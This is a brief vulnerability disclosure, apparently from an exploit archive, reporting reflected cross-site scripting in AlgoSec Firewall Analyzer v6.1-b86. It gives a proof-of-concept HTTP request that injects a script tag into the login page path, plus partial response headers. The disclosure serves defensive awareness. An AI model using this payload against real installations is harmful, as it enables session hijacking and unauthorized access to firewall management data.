AlgoSec Firewall Analyzer version 6.1-b86 suffers from a cross site scripting vulnerability.
a20ec40cfaafacdd8fd65a06cbfa4de1919a866f9d3478bbe4e587ca7a43d435
AlgoSec Firewall Analyzer Version v6.1-b86 cross-site scripting (XSS)
Vulnerability
================================================================================================================================================================
AlgoSec Firewall Analyzer Version v6.1-b86 cross-site
scripting (XSS) Vulnerability
================================================================================================================================================================
#Date- 7/8/2013
# code by Asheesh kumar Mani Tripathi
# Credit by Asheesh Anaconda
#Vulnerbility
AlgoSec Firewall Analyzer is prone to an cross-site scripting (XSS)
Vulnerability because the application fails to properly
sanitize user-supplied input
#Impact
A successful exploit could allow an attacker to compromise the application,
access or modify data, or exploit vulnerabilities
========================================================================================================================
Request
========================================================================================================================
GET /afa/php/Login.php/>'><ScRiPt>alert(11111111)</ScRiPt> HTTP/1.1
Host: 172.28.154.163
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101
Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3ihq73ut5ivc5spnnbm65vuiu1
========================================================================================================================
Response
========================================================================================================================
HTTP/1.1 200 OK
Date: Wed, 7 Aug 2013 15:59:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6